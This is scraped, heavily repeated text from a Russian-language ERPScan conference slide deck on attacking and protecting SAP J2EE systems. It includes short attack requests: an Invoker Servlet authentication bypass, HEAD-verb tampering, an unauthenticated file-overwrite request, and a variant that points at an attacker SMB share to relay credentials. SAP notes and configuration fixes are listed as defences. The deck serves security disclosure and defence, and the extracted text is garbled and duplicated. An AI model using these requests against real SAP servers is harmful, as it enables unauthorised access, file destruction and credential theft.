- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
